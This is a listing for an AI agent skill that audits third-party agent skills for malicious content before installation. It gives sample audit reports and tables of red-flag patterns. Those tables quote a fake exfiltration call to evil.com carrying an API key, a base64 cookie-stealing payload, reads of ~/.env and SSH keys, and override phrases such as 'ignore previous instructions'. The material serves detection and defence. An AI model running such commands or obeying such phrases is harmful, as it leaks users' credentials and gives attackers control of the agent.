From antigravity-awesome-skills
Performs 6-phase security audit on third-party AI agent skills before installation, scanning for malicious patterns, script risks, permissions, social engineering, and repo credibility. Use prior to adding skills from GitHub or registries.
npx claudepluginhub sickn33/antigravity-awesome-skillsThis skill uses the workspace's default tool permissions.
**7.5% of 14,706 OpenClaw skills are confirmed malicious.** This skill provides a structured 6-phase security review you run **before installing any third-party skill**.
Vets AI agent skills for security risks before installation from ClawdHub, GitHub, or other sources. Checks source reputation, code for red flags like external calls or credential access, permissions, and classifies risk levels.
Scans agent skills for security issues like prompt injection, malicious scripts, excessive permissions, secret exposure, and supply chain risks using static Python analysis and manual checks.
Evaluates security and safety of agent skills from GitHub repos, websites, or files. Detects prompt injections, malicious code, hidden instructions, data exfiltration with risk scores and recommendations.
Share bugs, ideas, or general feedback.
7.5% of 14,706 OpenClaw skills are confirmed malicious. This skill provides a structured 6-phase security review you run before installing any third-party skill.
Research findings (2026):
Pattern detection in SKILL.md:
ignore previous instructions, you are now...fetch(), curl, wget to unknown domainsatob(), base64 strings~/.env, process.env + network callsRead every referenced script:
Check if permissions match purpose:
Detect manipulation tactics:
Evaluate author/repo credibility:
Risk score + recommendation:
User: I want to install fancy-tool from github.com/suspicious-author/fancy-tool
Agent runs skill-audit:
📋 Surface Scan: 🚨 3 critical patterns
- download-pipe-shell pattern found
- References ~/.env
- External fetch to unknown domain
📁 Script Check: 🚨 scripts/install.sh
- Contains base64-encoded payload
- Makes HTTP POST to 192.168.x.x
🔑 Permissions: 🚨 Excessive
- Claims "format code"
- But reads ~/.ssh/id_rsa
Risk Score: 92/100 🔴 CRITICAL
Recommendation: 🚫 DO NOT INSTALL
User: Install this skill from github.com/trusted-author/useful-skill
Agent runs skill-audit:
📋 Surface Scan: ✅ No critical patterns
📁 Script Check: ✅ No scripts referenced
🔑 Permissions: ✅ Minimal (read/write in project dir)
📊 Repo Intel: ✅ Trusted author, 2+ years active
Risk Score: 12/100 ✅ LOW RISK
Recommendation: ✅ Safe to install
| Pattern | Example | Risk |
|---|---|---|
| Instruction override | ignore previous instructions | Agent takeover |
| External data exfil | fetch('http://evil.com?token=' + env.API_KEY) | Credential theft |
| Shell pipe | download piped into a shell interpreter | Arbitrary execution |
| Encoded payloads | atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ==') | Hidden commands |
| Credential reads | ~/.env, process.env + network | Key theft |
| Self-replication | "install in all repos" | Persistence spread |
| Pattern | Concern |
|---|---|
| Role manipulation | Changes agent identity |
| Hidden instructions | Invisible commands in comments |
| Undocumented scripts | SKILL.md references hidden scripts |
| Broad permissions | Excessive file/network access |
| Domain ambiguity | Domain takeover risk |
| Unpinned deps | Supply chain vulnerability |
From documented incidents:
clawhub1, clawbhub → fake official CLI, macOS binary to raw IPThis skill is adapted from aptratcn/skill-audit — MIT licensed.